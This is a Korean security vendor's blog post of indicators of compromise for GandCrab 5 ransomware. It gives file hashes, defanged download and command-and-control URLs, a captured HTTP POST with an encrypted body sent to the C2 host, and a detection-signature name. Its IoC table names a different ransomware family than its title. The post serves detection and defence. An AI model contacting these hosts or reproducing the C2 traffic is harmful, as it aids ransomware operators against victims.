Wins blog

글로벌 정보보안 파트너! Global Security  No.1 윈스는 국가대표 정보보안 기업에서 글로벌 강소기업으로 도약합니다.

보안 정보

앞 내용 보기 다음 내용 보기
악성코드 정보[Malware Info] Win32/Ransomware.GandCrab 5
작성일 2018-10-26 조회 618

 

ㅁ Malware IoC

 

  Pattern    Win32/Ransomware.Kraken 2.0.6
  Filename    -
  Type    PE (exe)
  Size    172,032 bytes
  MD5   2d351d67eab01124b7189c02cff7595f

 

 

 

ㅁ Malware Traffic

 

POST /uploads/imgs/dadarufu.bmp HTTP/1.1

Content-Type: multipart/form-data

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

Host: www.poketeg.com

Content-Length: 612

Cache-Control: no-cache

 

wfKD6iudumBkmpL8IRr4U4uxFFarOXztwTwmOrT1y1YWvOiWMx5GYaRdvZZATp5RsHZy7nRWorfSTBKH

mR5JBKvzoNMt7/r6ckHBDDniDpJO89rFN//AmFuoI5B0Lo+j+Pxp2XHxFJKzioGhekSJAvkAi7ZIONmX

7LnVbV4kbXRqbYOWpMDjYbJYeKTHxtcpFY4S29mAQVKuZBlVvAObuQjcNCJl2M2MJ0O6MKwP2IpPLAOT

PJxVmtooRHZiP6A/SvqD1pBzxDbNjcBAGXgql9Fndd03CBIxfQ7RDIArz30vSnTFTA/DkektItipqZKn

uLqg5+ti9bEwkRnBvuLn/zk2TOtJGoJYOFqOBiPtpBHSEdwboScR4tm4aqbiY8lyboyk2Xmiw5RJTT4q

eFPnJNYJ95FlwKEoDhO+nNY+Yu4qAMuf4mEwg69rKw3txAZKxg7xZinpChFL3v3LLuao1wIZNHQTRlWK

fznZ1lngc38OmU7fjiyrQR1nkLInlsaw/XJNVcvpLjebfE0cKMBuP3BNgX9VQ2fCnaYXEqHtb0jxBdZM

M5H4Hp8OYr/ORccPpoloV/LutbOMzJ/9Z3Zbh8MzuOwZRaFtAv8=

 

 

ㅁ Malware String

 

 - http://filestorage[.]biz/download.php?file=e541302686cca000584050d41e254261
 - http://memesmix[.]net/media/created/dd0doq[.]jpg

 

 

 

 

ㅁ Malware C2

 
 - www[.]poketeg[.]com/uploads/imgs/dadarufu.bmp

 

 

 

ㅁ Malware Hash

 

 - 64d341ecbc52f9d78080bf23559ec1778824979dd19498ee44032ec1d5224ff6

 

 

 

ㅁ Wins Sniper Pattern

 

 - [4462] Win32/Ransomware.GandCrab5.Generic

 

 

 

 

 

Source

https://www.virustotal.com/#/file/64d341ecbc52f9d78080bf23559ec1778824979dd19498ee44032ec1d5224ff6/detection

첨부파일 첨부파일이 없습니다.
태그 Malware Info  랜섬웨어  GandCrab